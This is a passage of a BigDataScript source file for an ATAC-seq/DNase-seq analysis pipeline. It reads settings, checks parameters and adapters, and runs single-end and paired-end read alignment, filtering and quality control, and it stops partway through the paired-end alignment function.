ENCODE := false help Force to use parameter set (-smooth_win 73 -idr_thresh 0.05 -multimapping 4) for ENCODE. no_browser_tracks := false help Disable generation of genome browser tracks (workaround for bzip2 shared library issue). overlap_pval_thresh := 0.01 help p-val threshold for overlapped peaks (default: 0.01). macs2_pval_thresh := 0.01 help MACS2 p-val threshold for calling peaks (default: 0.1). macs2_pval_thresh_bw := 0.01 help MACS2 p-val threshold for generating BIGWIG signal tracks (default: 0.1). enable_idr := false help Enable IDR on called peaks. auto_detect_adapter := false help Automatically find and trim adapters. adjust_bedpe := false // help (BETA) adjust BEDPE (by Daniel Kim). exclude_ppr_in_naive_overlap := false //help Exclude peaks from pooled pseudo replicates in naive overlap. This flag works for multiple replicate case only. 
disable_gb_peak := true // disable gapped/broad peak generation help() // show help contexts include "modules/pipeline_template.bds" include "modules/input.bds" include "modules/input_adapter.bds" include "modules/align_bowtie2.bds" include "modules/align_trim_adapter.bds" include "modules/align_etc.bds" include "modules/postalign_bam.bds" include "modules/postalign_bed.bds" include "modules/postalign_xcor.bds" include "modules/callpeak_macs2_atac.bds" include "modules/callpeak_naive_overlap.bds" include "modules/callpeak_idr.bds" include "modules/callpeak_blacklist_filter.bds" include "modules/callpeak_bigbed.bds" include "modules/ataqc.bds" include "modules/ENCODE_accession.bds" // Important output file names are stored in global variables (usually a string map string{} with a key with replicate id, pair id) // e.g. filt_bam{"1"} = filtered bam for replicate 1, peak_pr1{"2"} = peak file for pseudo replicate 1 of replicate 2 string{} fastq, align_log, flagstat_qc, bam, filt_bam, dup_qc, flagstat_nodup_qc, pbc_qc, xcor_qc, xcor_plot string{} final_tag, final_tag_pr1, final_tag_pr2 string final_tag_pooled, final_tag_ppr1, final_tag_ppr2 string{} peak, peak_001, peak_pr1, peak_pr2 string peak_pooled, peak_pooled_001, peak_ppr1, peak_ppr2 string{} gpeak, gpeak_001, gpeak_pr1, gpeak_pr2 string gpeak_pooled, gpeak_pooled_001, gpeak_ppr1, gpeak_ppr2 string num_peak_log string{} pval_bigwig_001, fc_bigwig_001 string{} idr_tr, idr_pr, idr_tr_png, idr_pr_png, idr_tr_log, idr_pr_log string idr_ppr, idr_opt, idr_consv, idr_ppr_png, idr_ppr_log string idr_qc string{} idr_qc_FRiP string{} peak_overlap_tr, peak_overlap_pr string peak_overlap_ppr, peak_overlap_opt, peak_overlap_consv string peak_overlap_qc string{} peak_overlap_qc_FRiP string{} ataqc_qc main() void main() { // atac pipeline starts here init_atac() chk_param() // check if parameters are valid chk_adapters() chk_input( true_rep, false ) do_align() call_peaks() read_input_peak() // if inputs are peaks, read them 
	// --- tail of the main pipeline driver (its head is above this chunk) ---
	do_naive_overlap()
	do_idr()
	wait

	log_number_of_peaks()
	ataqc()
	// blacklist-filter peaks and also make ENCODE accession metadata for them
	filter_peak_and_convert_to_bigbed()
	tar_all_logs()
	ENCODE3_overall_qc()
	report()
}

// Initialize the ATAC module: read config, set defaults, print settings,
// and register report/graph labels. Called once at pipeline start-up.
void init_atac() {
	read_conf_atac()
	init_etc_atac()
	print_atac()
	init_filetable()
}

// Read ATAC-specific flags from the configuration file into the
// module-level globals of the same names (each keeps its prior value
// as the default when the key is absent).
void read_conf_atac() {
	type = get_conf_val( type, ["type"] )
	align = get_conf_val_bool( align, ["align"] )
	true_rep = get_conf_val_bool( true_rep, ["true_rep"] )
	no_ataqc = get_conf_val_bool( no_ataqc, ["no_ataqc"] )
	no_xcor = get_conf_val_bool( no_xcor, ["no_xcor"] )
	csem = get_conf_val_bool( csem, ["csem"] )
	smooth_win = get_conf_val( smooth_win, ["smooth_win"] )
	dnase_seq = get_conf_val_bool( dnase_seq, ["dnase_seq"] )
	idr_thresh = get_conf_val_real( idr_thresh, ["idr_thresh"] )
	subsample_xcor = get_conf_val( subsample_xcor, ["subsample_xcor"] )
	subsample = get_conf_val( subsample, ["subsample"] )
	ENCODE3 = get_conf_val_bool( ENCODE3, ["ENCODE3"] )
	ENCODE = get_conf_val_bool( ENCODE, ["ENCODE","ENCODE1"] )
	no_browser_tracks = get_conf_val_bool( no_browser_tracks, ["no_browser_tracks"] )
	overlap_pval_thresh = get_conf_val_real( overlap_pval_thresh, ["overlap_pval_thresh"] )
	// exclude_ppr_in_naive_overlap = get_conf_val_bool( exclude_ppr_in_naive_overlap, ["exclude_ppr_in_naive_overlap"] )
	macs2_pval_thresh = get_conf_val_real( macs2_pval_thresh, ["macs2_pval_thresh"] )
	macs2_pval_thresh_bw = get_conf_val_real( macs2_pval_thresh_bw, ["macs2_pval_thresh_bw"] )
	enable_idr = get_conf_val_bool( enable_idr, ["enable_idr"] )
	auto_detect_adapter = get_conf_val_bool( auto_detect_adapter, ["auto_detect_adapter"] )
	// adjust_bedpe = get_conf_val_bool( adjust_bedpe, ["adjust_bedpe"] )
}

// Misc. defaults that are not read from the configuration file.
void init_etc_atac() {
	default_is_pe = true
	speak_xcor = 0 // set fragment length explicitly as zero for cross corr. analysis
}

// Echo the effective ATAC settings to stdout, then coerce the pipeline
// type to "dnase-seq" when -dnase_seq was given.
void print_atac() {
	print( "\n\n== atac pipeline settings\n")
	print( "Type of pipeline\t\t\t: $type\n")
	print( "Align only\t\t\t\t: " + align + "\n")
	print( "# reads to subsample replicates (0 if no subsampling)\t: "+parse_number( subsample )+"\n")
	print( "# reads to subsample for cross-corr. analysis \t: " +parse_number( subsample_xcor)+"\n")
	print( "No pseudo replicates\t\t\t: $true_rep\n")
	print( "No ATAQC (advanced QC report)\t\t: $no_ataqc\n")
	print( "No Cross-corr. analysis\t\t\t: $no_xcor\n")
	print( "Use CSEM for alignment\t\t\t: $csem\n")
	print( "Smoothing window for MACS2\t\t: $smooth_win\n")
	print( "DNase Seq\t\t\t\t: $dnase_seq\n")
	print( "IDR threshold\t\t\t\t: $idr_thresh\n" )
	print( "Force to use ENCODE3 parameter set\t: $ENCODE3\n" )
	print( "Force to use ENCODE parameter set\t: $ENCODE\n" )
	print( "Disable genome browser tracks\t: $no_browser_tracks\n" )
	print( "p-val thresh. for overlapped peaks\t: $overlap_pval_thresh\n")
	// print( "Exclude ppr in naive overlap\t: $exclude_ppr_in_naive_overlap\n")
	print( "MACS2 p-val thresh. for peaks\t: $macs2_pval_thresh\n")
	print( "MACS2 p-val thresh. for BIGWIGs\t\t: $macs2_pval_thresh_bw\n")
	print( "Enable IDR on called peaks\t: $enable_idr\n")
	print( "Automatically find/trim adapters\t: $auto_detect_adapter\n")
	// print( "(BETA) adjust BEDPE (by Daniel Kim)\t: $adjust_bedpe\n")

	if ( dnase_seq ) type = "dnase-seq"
}

// Register every label used in the HTML file table and the graphviz
// workflow graph.
// init file table labels in HTML report
// add label to graphviz
// : Items in filetable will be sorted in the ascending order of rank
// : Items added later will have higher rank
void init_filetable() {
	// Level 1
	add_label_to_table("Raw reads")
	add_label_to_table("Alignment")
	add_label_to_table("Signal tracks")
	add_label_to_table("Peaks")
	add_label_to_table("QC and logs")
	// Level 2
	for (int i=1; i<=100; i++) \
		add_label_to_table("Replicate $i")
	add_label_to_table("True replicates")
	add_label_to_table("Pooled replicate")
	add_label_to_table("Pseudo-replicates")
	add_label_to_table("Pooled pseudo-replicate")
	add_label_to_table("Pooled pseudo-replicates")
	add_label_to_table("Optimal set")
	add_label_to_table("Conservative set")
	add_label_to_table("Naive overlap")
	add_label_to_table("MACS2")
	add_label_to_table("IDR")
	// Level 2 or 3
	add_label_to_table("Pseudo-replicate 1")
	add_label_to_table("Pseudo-replicate 2")
	add_label_to_table("Pooled pseudo-replicate 1")
	add_label_to_table("Pooled pseudo-replicate 2")
	for (int i=1; i<=20; i++) \
		for (int j=i+1; j<=20; j++) \
			add_label_to_table("Rep. $i vs Rep. $j")
	// Higher levels
	add_label_to_table("IDR QC")
	add_label_to_table("Fastq")
	add_label_to_table("Fastq 1")
	add_label_to_table("Fastq 2")
	add_label_to_table("Trimmed fastq")
	add_label_to_table("Trimmed fastq 1")
	add_label_to_table("Trimmed fastq 2")
	add_label_to_table("Bowtie2 map. log")
	add_label_to_table("Bam")
	add_label_to_table("Filtered bam")
	add_label_to_table("Sorted bam")
	add_label_to_table("Dedup. log")
	add_label_to_table("Bowtie2 map. flagstat log")
	add_label_to_table("PBC log")
	add_label_to_table("Bedpe")
	add_label_to_table("Subsampled bedpe")
	add_label_to_table("Tag-align")
	add_label_to_table("Subsampled tag-align")
	add_label_to_table("Cross-corr. log")
	add_label_to_table("Cross-corr. plot")
	add_label_to_table("P-value")
	add_label_to_table("Fold enrichment")
	add_label_to_table("Narrow peak")
	add_label_to_table("Gapped peak")
	add_label_to_table("Filtered narrow peak")
	add_label_to_table("Filtered gapped peak")
	add_label_to_table("IDR peak")
	add_label_to_table("Peak")
	add_label_to_table("Filtered peak")
	// NOTE(review): "Filtered gapped peak" is registered twice (see above) —
	// confirm add_label_to_table() is idempotent or drop one of the two calls.
	add_label_to_table("Filtered gapped peak")
	add_label_to_table("ATAQC")
	add_label_to_table("IDR plot")
	add_label_to_table("Unthresholded IDR peak")

	// add label to graphviz (short name, long name)
	for (int i=1; i<=50; i++) {
		add_label_to_graph("rep$i", "Replicate $i")
		add_label_to_graph("rep$i-pr1", "Pseudo-replicate 1 for rep. $i")
		add_label_to_graph("rep$i-pr2", "Pseudo-replicate 2 for rep. $i")
		add_label_to_graph("rep$i-pr", "Pseudo replicates for rep. $i")
		for (int j=1; j<=20; j++) {
			add_label_to_graph("rep$i-rep$j", "Rep. $i vs. Rep. $j")
		}
	}
	add_label_to_graph("pooled_rep", "Pooled replicate")
	add_label_to_graph("ppr", "Pooled pseudo-replicates")
	add_label_to_graph("ppr1", "Pooled pseudo-replicate 1")
	add_label_to_graph("ppr2", "Pooled pseudo-replicate 2")
}

// Validate parameter combinations, disable features that are not
// applicable to the given inputs, and apply the ENCODE/ENCODE3 presets.
void chk_param() {
	print( "\n== checking atac parameters ...\n" );
	if ( has_input_fastq() ) chk_align_bwt2()
	if ( !align ) chk_callpeak_macs2()
	if ( enable_idr ) chk_idr()
	if ( !no_ataqc ) {
		no_ataqc = !chk_ataqc()
	}
	if ( has_pe_input_tag() && subsample > 0 ) {
		print("Warning: Cannot subsample paired end tagaligns. Disabling subsampling...\n")
		subsample = 0
	}
	if ( !has_input_fastq() && !no_ataqc ) {
		print("Warning: ATAQC is available for fastq inputs only. Disabling ATAQC...\n")
		no_ataqc = true
	}
	if ( has_pe_input_fastq() && csem ) {
		error("CSEM (-csem) is not available for paired end fastqs!\n")
	}
	// NOTE(review): the ENCODE and ENCODE3 branches below set identical
	// values; confirm this is intentional (both presets share parameters).
	if ( ENCODE ) {
		print("Info: ENCODE flag is on (-smooth_win 73 -idr_thresh 0.05 -multimapping 4).\n")
		smooth_win = 73
		idr_thresh = 0.05
		multimapping = 4
	}
	if ( ENCODE3 ) {
		print("Info: ENCODE3 flag is on (-smooth_win 73 -idr_thresh 0.05 -multimapping 4).\n")
		smooth_win = 73
		idr_thresh = 0.05
		multimapping = 4
	}
	//ENCODE_assay_category = "DNA accessibility"
	if ( dnase_seq ) {
		ENCODE_assay_title = "DNase-seq"
	}
	else {
		ENCODE_assay_title = "ATAC-seq"
	}
}

// Print, per replicate and per read pair, which adapter will be trimmed
// (user-specified, auto-detected, or none). For PE input, errors out when
// the pooling IDs of R1 and R2 do not match.
void chk_adapters() {
	print( "\n== checking adapters to be trimmed ...\n" );
	// check adapters
	for ( int rep=1; rep <= get_num_rep(); rep++) {
		if ( is_input_fastq( rep ) ) {
			fastqs_R1 := get_fastq( 0, rep, 1 )
			adapters_R1 := get_adapter( 0, rep, 1 )
			if ( is_se( rep ) ) { //SE
				print("Rep$rep adapters (SE) : \n")
				for ( string pool_id : fastqs_R1.keys() ) {
					if ( !adapters_R1.hasKey(pool_id) ) {
						if ( auto_detect_adapter ) {
							print("\t$pool_id: automatically detected and trimmed.\n")
						}
						else {
							print("\t$pool_id: no adapter specified.\n")
						}
					}
					else {
						adapter := adapters_R1{pool_id}
						print("\t$pool_id: $adapter\n")
					}
				}
			}
			else { //PE
				print("Rep$rep R1 adapters (PE) : \n")
				for ( string pool_id : fastqs_R1.keys() ) {
					if ( !adapters_R1.hasKey(pool_id) ) {
						if ( auto_detect_adapter ) {
							print("\t$pool_id: automatically detected and trimmed.\n")
						}
						else {
							print("\t$pool_id: no adapter specified.\n")
						}
					}
					else {
						adapter := adapters_R1{pool_id}
						print("\t$pool_id: $adapter\n")
					}
				}
				fastqs_R2 := get_fastq( 0, rep, 2 )
				adapters_R2 := get_adapter( 0, rep, 2 )
				print("Rep$rep R2 adapters (PE) : \n")
				for ( string pool_id : fastqs_R2.keys() ) {
					if ( !adapters_R2.hasKey(pool_id) ) {
						if ( auto_detect_adapter ) {
							print("\t$pool_id: automatically detected and trimmed.\n")
						}
						else {
							print("\t$pool_id: no adapter specified.\n")
						}
					}
					else {
						adapter := adapters_R2{pool_id}
						print("\t$pool_id: $adapter\n")
					}
				}
				if ( !equals( adapters_R1.keys(), adapters_R2.keys() ) ) {
					error("Match pooling IDs (-fastq[REP_ID]_[PAIR_ID]:[POOL_ID]) in both pairs.\n")
				}
			}
			//if ( !is_se( rep ) && fastqs.size() < 2 ) \
			//	error("A pair of fastqs are needed for replicate $rep (if it's single-ended add '-se')\n")
		}
	}
}

// Align all replicates. Threads are apportioned to replicates in
// proportion to their (weighted) input file sizes; replicates run in
// parallel unless -no_par is set.
void do_align() {
	if ( is_input_peak() ) return

	// filesize of input ( map with key $rep )
	int{} filesize
	for ( int rep=1; rep <= get_num_rep(); rep++) {
		// check file size to distribute nth to each nth_app
		// determine # threads for each app related to alignment
		// get file size in bytes
		if ( is_input_fastq( rep ) ) {
			fastqs := get_fastqs( rep )
			filesize{rep} = (fastqs[0]).size()
			if ( fastqs.size() > 1) filesize{rep} += (fastqs[1]).size()*3 // multiply 3 to allocate more cpus for align
		}
		else if ( is_input_bam( rep ) ) filesize{rep} = (get_bam( 0, rep )).size()
		else if ( is_input_filt_bam( rep ) ) filesize{rep} = (get_filt_bam( 0, rep )).size()
		else if ( is_input_tag( rep ) ) filesize{rep} = (get_tag( 0, rep )).size()*10
	}
	//// distribute # threads for each replicate
	nth_rep := distribute_nonzero( nth, filesize ) // distribute # threads according to input filesize

	for (int rep=1; rep<=get_num_rep(); rep++) {
		if ( no_par ) do_align( rep, nth_rep{rep} )
		else par do_align( rep, nth_rep{rep} )
	}
	wait

	print( "\n== Done do_align()\n" )
}

// Dispatch one replicate to the single-end or paired-end aligner.
void do_align( int rep, int nth_rep ) {
	if ( is_se( rep ) ) align_SE( rep, nth_rep )
	else align_PE( rep, nth_rep )
}

// Single-end pipeline for one replicate: adapter detect/trim -> pool ->
// bowtie2 (or CSEM) -> dedup/filter -> tagAlign -> subsample/TN5-shift ->
// pseudo-replicates -> cross-correlation. Results are stored in the
// module-level maps (bam{}, filt_bam{}, final_tag{}, ...), keyed by rep.
void align_SE( int rep, int nth_rep ) {
	group := get_group_name( rep )
	long := get_long_group_name( rep )

	aln_o_dir := mkdir( "$out_dir/align/$group" ) // create align output directory
	qc_o_dir := mkdir( "$out_dir/qc/$group" ) // create qc output dir.

	string bam_, read_length_log, flagstat_qc_
	string{} fastqs, trimmed_fastqs, adapters // format: key=pool_id, val=fastq_path or adapter
	string[] fastqs_arr
	if ( is_input_fastq( rep ) ) {
		fastqs = get_fastq( 0, rep, 1 )
		adapters = get_adapter( 0, rep, 1 )
		fastqs_arr = map_to_array( fastqs )
		// string[] trimmed_fastqs
		for ( string pool_id : fastqs.keys() ) {
			// if ( adapters.size()==0 && !auto_detect_adapter ) {
			if ( !adapters.hasKey(pool_id) && !auto_detect_adapter ) {
				trimmed_fastqs{pool_id} = fastqs{pool_id}
				print("\nSpecified adapter for $group:$pool_id (SE) : None\n")
			}
			else {
				string adapter
				if ( !adapters.hasKey(pool_id) && auto_detect_adapter ) {
					string adapter_log, tid
					(adapter_log, tid) = detect_adapter( fastqs{pool_id}, qc_o_dir, group )
					wait tid
					adapter = parse_adapter_log( adapter_log )
					if ( adapter ) {
						print("\nDetected adapter for $group:$pool_id (SE) : $adapter\n")
					}
					else {
						print("\nDetected adapter for $group:$pool_id (SE) : No adapter detected. Skip trimming.\n")
					}
				}
				else {
					adapter = adapters{pool_id}
					print("\nSpecified adapter for $group:$pool_id (SE) : $adapter\n")
				}
				if ( adapter ) {
					suffix := (pool_id == "00" ? "" : ":$pool_id")
					trimmed_fastqs{pool_id} = \
						trim_adapters( fastqs{pool_id}, adapter, aln_o_dir, group, suffix )
				}
				else {
					trimmed_fastqs{pool_id} = fastqs{pool_id}
				}
			}
		}
		wait
		string p1
		trimmed_fastqs_arr := map_to_array(trimmed_fastqs)
		if ( trimmed_fastqs.size() > 1 ) { // if multiple fastqs are given, pool trimmed fastqs
			p1 = pool_fastq( trimmed_fastqs_arr, aln_o_dir, group )
			// add_file_to_report( p1, "pooled\\nfastq" , group, "Raw reads/$long/Pooled fastq" )
			wait
		}
		else {
			p1 = trimmed_fastqs_arr[0]
		}
		fastq{rep} = p1
		string align_log_
		read_length_log = get_read_length_log( p1, qc_o_dir, group )
		if ( csem ) {
			( bam_, align_log_ ) = bowtie2_csem( p1, aln_o_dir, qc_o_dir, group, nth_rep )
		}
		else {
			( bam_, align_log_ ) = bowtie2( p1, aln_o_dir, qc_o_dir, group, nth_rep )
		}
		wait
		align_log{rep} = align_log_
		add_file_to_table( align_log_, "QC and logs/$long/Bowtie2 map. log")
		flagstat_qc_ = samtools_flagstat_bam( bam_, qc_o_dir, group )
		wait
		flagstat_qc{rep} = flagstat_qc_
		add_file_to_table( flagstat_qc_, "QC and logs/$long/Bowtie2 map. flagstat log")
		// add to report
		tmp_log := parse_flagstat( flagstat_qc_ )
		raw_reads := metric_prefix( parse_int( tmp_log{"total"} ) )
		mapped_reads := metric_prefix( parse_int( tmp_log{"mapped"} ) )
		if ( trimmed_fastqs_arr.size() > 1 ) { // if multiple fastqs are given, pool trimmed fastqs
			for ( int i=0; i<fastqs_arr.size(); i++) {
				suffix := fastqs_arr.size()==1 ? "" : ":$i"
				add_file_to_report( fastqs_arr[i], "fastq$suffix", group, \
					"Raw reads/$long/Fastq$suffix" )
				if ( trimmed_fastqs_arr[i]!=fastqs_arr[i] ) {
					add_file_to_report( trimmed_fastqs_arr[i], "trimmed\\nfastq$suffix", group, \
						"Raw reads/$long/Trimmed fastq$suffix" )
				}
			}
			add_file_to_report( p1, "pooled\\nfastq" + (raw_reads ? "\\n$raw_reads" : ""), group, \
				"Raw reads/$long/Pooled fastq"+ (raw_reads ? " ($raw_reads)" : "") )
		}
		else {
			for ( int i=0; i<fastqs_arr.size(); i++) {
				if ( trimmed_fastqs_arr[i]==fastqs_arr[i] ) {
					add_file_to_report( fastqs_arr[i], "fastq" + (raw_reads ? "\\n$raw_reads" : ""), group, \
						"Raw reads/$long/Fastq"+ (raw_reads ? " ($raw_reads)" : "") )
				}
				else {
					add_file_to_report( fastqs_arr[i], "fastq", group, \
						"Raw reads/$long/Fastq" )
					add_file_to_report( trimmed_fastqs_arr[i], "trimmed\\nfastq" + (raw_reads ? "\\n$raw_reads" : ""), group, \
						"Raw reads/$long/Trimmed fastq"+ (raw_reads ? " ($raw_reads)" : "") )
				}
			}
		}
		bam{rep} = bam_
		add_file_to_report( bam_, "bam" + (mapped_reads ? "\\n$mapped_reads" : ""), group, \
			"Alignment/$long/Bam" + (mapped_reads ? " ($mapped_reads)" : "") )
	}
	string filt_bam_, dup_qc_, pbc_qc_, flagstat_nodup_qc_
	if ( is_input_fastq( rep ) || is_input_bam( rep ) ) {
		if ( is_input_bam( rep ) ) {
			bam_ = get_bam( 0, rep )
			bam{rep} = bam_
		}
		string deduped_reads
		if ( no_dup_removal ) {
			string tmp
			( filt_bam_, tmp ) = dedup_bam( bam_, aln_o_dir, qc_o_dir, group, nth_rep )
			wait
		}
		else {
			( filt_bam_, dup_qc_, flagstat_nodup_qc_, pbc_qc_ ) \
				= dedup_bam( bam_, aln_o_dir, qc_o_dir, group, nth_rep )
			dup_qc{rep} = dup_qc_
			pbc_qc{rep} = pbc_qc_
			flagstat_nodup_qc{rep} = flagstat_nodup_qc_
			add_file_to_table( dup_qc_, "QC and logs/$long/Dedup. log")
			add_file_to_table( pbc_qc_, "QC and logs/$long/PBC log")
			add_file_to_table( flagstat_nodup_qc_, "QC and logs/$long/Filtered flagstat log")
			wait
			tmp_log := parse_flagstat( flagstat_nodup_qc_ )
			deduped_reads = metric_prefix( parse_int( tmp_log{"total"} ) )
		}
		// add to report
		filt_bam{rep} = filt_bam_
		add_file_to_report( filt_bam_, "filt. bam" + (deduped_reads ? "\\n$deduped_reads" : ""), group, \
			"Alignment/$long/Filtered & deduped bam" + (deduped_reads ? " ($deduped_reads)" : "") )
		// For ENCODE accession, use different step name for single rep case
		if ( is_input_fastq( rep ) ) {
			string ENCODE_step_name
			if ( get_num_rep() == 1 ) ENCODE_step_name = "anshul-kundaje:atac-seq-trim-align-filter-step-run-single-rep-v1"
			else ENCODE_step_name = "anshul-kundaje:atac-seq-trim-align-filter-step-run-v1"
			if ( fastqs.size() > 0 ) \
				add_ENCODE_metadata_to_summary_json( "bam", "", "alignments", \
					ENCODE_step_name, filt_bam_, fastqs_arr )
			if ( flagstat_qc_ ) {
				add_ENCODE_quality_metrics_to_summary_json( "samtools_flagstats_quality_metric", \
					ENCODE_step_name, [filt_bam_], [flagstat_qc_] )
			}
		}
	}
	string tag
	if ( is_input_fastq( rep ) || is_input_bam( rep ) || is_input_filt_bam( rep ) ) {
		if ( is_input_filt_bam( rep ) ) {
			filt_bam_ = get_filt_bam( 0, rep )
			filt_bam{rep} = filt_bam_
		}
		tag = bam_to_tag( filt_bam_, aln_o_dir, group )
		wait
	}
	string final_tag_, final_tag_pr1_, final_tag_pr2_
	if ( is_input_fastq( rep ) || is_input_bam( rep ) || is_input_filt_bam( rep ) || is_input_tag( rep ) ) {
		if ( is_input_tag( rep ) ) tag = get_tag( 0, rep )
		string subsampled_tag
		if ( parse_number( subsample ) != 0 ) {
			subsampled_tag = subsample_tag( tag, parse_number( subsample ), false, aln_o_dir, group )
			wait
		}
		else {
			subsampled_tag = tag
		}
		// TN5 shifting is an ATAC-specific correction; skipped for DNase-seq
		if ( is_dnase_seq() ) {
			final_tag_ = subsampled_tag
		}
		else {
			final_tag_ = tn5_shift_tag( subsampled_tag, aln_o_dir, group )
		}
		final_tag{rep} = final_tag_
		add_file_to_report( final_tag_, "tag-align", group, "Alignment/$long/Tag-align" )
		wait
		if ( !true_rep ) {
			aln_pr1_o_dir := mkdir( "$out_dir/align/pseudo_reps/$group/pr1" )
			aln_pr2_o_dir := mkdir( "$out_dir/align/pseudo_reps/$group/pr2" )
			( final_tag_pr1_, final_tag_pr2_ ) = spr( final_tag_, aln_pr1_o_dir, aln_pr2_o_dir, group )
			final_tag_pr1{rep} = final_tag_pr1_
			final_tag_pr2{rep} = final_tag_pr2_
			add_file_to_report( final_tag_pr1_, "tag-align", "$group-pr1", "Alignment/Pseudo-replicates/$long/Pseudo-replicate 1/Tag-align" )
			add_file_to_report( final_tag_pr2_, "tag-align", "$group-pr2", "Alignment/Pseudo-replicates/$long/Pseudo-replicate 2/Tag-align" )
			wait
		}
		if ( !no_xcor ) {
			// cross-corr. analysis
			subsampled_tag_xcor := subsample_tag( final_tag_, parse_number( subsample_xcor ), true, aln_o_dir, group )
			wait
			// xcor
			string xcor_qc_, xcor_plot_
			( xcor_qc_, xcor_plot_ ) = xcor( subsampled_tag_xcor, qc_o_dir, group, nth_rep )
			xcor_qc{rep} = xcor_qc_
			xcor_plot{rep} = xcor_plot_
			add_file_to_report( final_tag_, "tag-align", group, "Alignment/$long/Tag-align" )
			add_file_to_table( xcor_plot_, "QC and logs/$long/Cross-corr. plot" )
			wait
			string ENCODE_step_name
			if ( pbc_qc_ && read_length_log ) {
				if ( get_num_rep() == 1 ) \
					ENCODE_step_name = "anshul-kundaje:atac-seq-trim-align-filter-step-run-single-rep-v1"
				else \
					ENCODE_step_name = "anshul-kundaje:atac-seq-trim-align-filter-step-run-v1"
				add_ENCODE_quality_metrics_to_summary_json( "complexity_xcorr_quality_metric", \
					ENCODE_step_name, \
					[filt_bam_], [pbc_qc_, xcor_qc_, read_length_log], [ "false", xcor_plot_] )
			}
		}
	}
}

// Paired-end counterpart of align_SE: per-pool adapter handling on both
// mates -> pool -> bowtie2_PE -> PE dedup -> BEDPE -> tagAlign ->
// subsample/TN5-shift -> pseudo-replicates -> cross-correlation.
void align_PE( int rep, int nth_rep ) {
	group := get_group_name( rep )
	long := get_long_group_name( rep )

	aln_o_dir := mkdir( "$out_dir/align/$group" ) // create align output directory
	qc_o_dir := mkdir( "$out_dir/qc/$group" ) // create qc output dir.

	string bam_, align_log_, read_length_log, flagstat_qc_
	string{} fastqs_pair1, fastqs_pair2, adapters_pair1, adapters_pair2
	string{} trimmed_fastqs_pair1, trimmed_fastqs_pair2
	string[] fastqs_pair1_arr, fastqs_pair2_arr
	if ( is_input_fastq( rep ) ) {
		fastqs_pair1 = get_fastq( 0, rep, 1 )
		fastqs_pair2 = get_fastq( 0, rep, 2 )
		fastqs_pair1_arr = map_to_array(fastqs_pair1)
		fastqs_pair2_arr = map_to_array(fastqs_pair2)
		adapters_pair1 = get_adapter( 0, rep, 1 )
		adapters_pair2 = get_adapter( 0, rep, 2 )
		// NOTE(review): this re-declaration shadows the function-scope
		// trimmed_fastqs_pair1/2 above — verify the shadowing is intended.
		string{} trimmed_fastqs_pair1, trimmed_fastqs_pair2
		if ( fastqs_pair1.size() != fastqs_pair2.size() ) {
			error("Number of fastqs to be pooled for pair 1 and pair 2 do not match!\n")
		}
		// for ( int i=0; i<fastqs_pair1.size(); i++) {
		for ( string pool_id : fastqs_pair1.keys() ) {
			if ( !fastqs_pair2.hasKey(pool_id) ) error("Paired fastq not found for "+fastqs_pair1{pool_id}+"\n")
			if ( !(adapters_pair1.hasKey(pool_id) && adapters_pair2.hasKey(pool_id)) \
				&& !auto_detect_adapter ) {
				trimmed_fastqs_pair1{pool_id} = fastqs_pair1{pool_id}
				trimmed_fastqs_pair2{pool_id} = fastqs_pair2{pool_id}
				print("\nSpecified adapter for $group:$pool_id (PE) : None\n")
			}
			else {
				string adapter1, adapter2
				if ( !(adapters_pair1.hasKey(pool_id) && adapters_pair2.hasKey(pool_id)) \
					&& auto_detect_adapter ) {
					string adapter_log1, adapter_log2, tid1, tid2
					(adapter_log1, tid1) = detect_adapter( fastqs_pair1{pool_id}, qc_o_dir, group )
					(adapter_log2, tid2) = detect_adapter( fastqs_pair2{pool_id}, qc_o_dir, group )
					wait [tid1, tid2]
					adapter1 = parse_adapter_log( adapter_log1 )
					adapter2 = parse_adapter_log( adapter_log2 )
					if ( adapter1 && adapter2 ) {
						print("\nDetected adapter for $group:$pool_id (PE) : $adapter1, $adapter2\n")
					}
					else {
						print("\nDetected adapter for $group:$pool_id (PE) : No adapter detected. Skip trimming (fastq1: $adapter1, fastq2: $adapter2).\n")
					}
				}
				else if ( adapters_pair1.hasKey(pool_id) && adapters_pair2.hasKey(pool_id) ) {
					adapter1 = adapters_pair1{pool_id}
					adapter2 = adapters_pair2{pool_id}
					print("\nSpecified adapter for $group:$pool_id (PE) : $adapter1, $adapter2\n")
				}
				if ( adapter1 && adapter2 ) {
					suffix := fastqs_pair1.size()==1 ? "" : ":$pool_id"
					( trimmed_fastqs_pair1{pool_id}, trimmed_fastqs_pair2{pool_id} ) \
						= trim_adapters_PE( fastqs_pair1{pool_id}, fastqs_pair2{pool_id}, \
							adapter1, adapter2, aln_o_dir, group, suffix )
					// add_file_to_report( p1, "trimmed\\nfastq 1$suffix", group, "Raw reads/$long/Trimmed fastq 1$suffix" )
					// add_file_to_report( p2, "trimmed\\nfastq 2$suffix", group, "Raw reads/$long/Trimmed fastq 2$suffix" )
				}
				else {
					trimmed_fastqs_pair1{pool_id} = fastqs_pair1{pool_id}
					trimmed_fastqs_pair2{pool_id} = fastqs_pair2{pool_id}
				}
			}
		}
		wait
		string p1, p2
		trimmed_fastqs_pair1_arr := map_to_array(trimmed_fastqs_pair1)
		trimmed_fastqs_pair2_arr := map_to_array(trimmed_fastqs_pair2)
		if ( trimmed_fastqs_pair1.size() > 1 ) { // if multiple fastqs are given, pool trimmed fastqs
			p1 = pool_fastq( trimmed_fastqs_pair1_arr, aln_o_dir, group )
			p2 = pool_fastq( trimmed_fastqs_pair2_arr, aln_o_dir, group )
			// add_file_to_report( p1, "pooled\\nfastq 1" , group, "Raw reads/$long/Pooled fastq 1" )
			// add_file_to_report( p2, "pooled\\nfastq 2" , group, "Raw reads/$long/Pooled fastq 2" )
			wait
		}
		else {
			p1 = trimmed_fastqs_pair1_arr[0]
			p2 = trimmed_fastqs_pair2_arr[0]
		}
		fastq{rep+",1"} = p1
		fastq{rep+",2"} = p2
		read_length_log = get_read_length_log( p1, qc_o_dir, group )
		( bam_, align_log_ ) = bowtie2_PE( p1, p2, aln_o_dir, qc_o_dir, group, nth_rep )
		wait
		align_log{rep} = align_log_
		add_file_to_table( align_log_, "QC and logs/$long/Bowtie2 map. log")
		flagstat_qc_ = samtools_flagstat_bam( bam_, qc_o_dir, group )
		wait
		flagstat_qc{rep} = flagstat_qc_
		add_file_to_table( flagstat_qc_, "QC and logs/$long/Bowtie2 map. flagstat log")
		// add to report
		tmp_log := parse_flagstat( flagstat_qc_ )
		raw_reads := metric_prefix( parse_int( tmp_log{"total"} ) )
		// flagstat counts both mates, so reads-per-fastq is total/2
		half_raw_reads := metric_prefix( parse_int( tmp_log{"total"} )/2 )
		if ( trimmed_fastqs_pair1.size() > 1 ) {
			for ( string pool_id : fastqs_pair1.keys() ) {
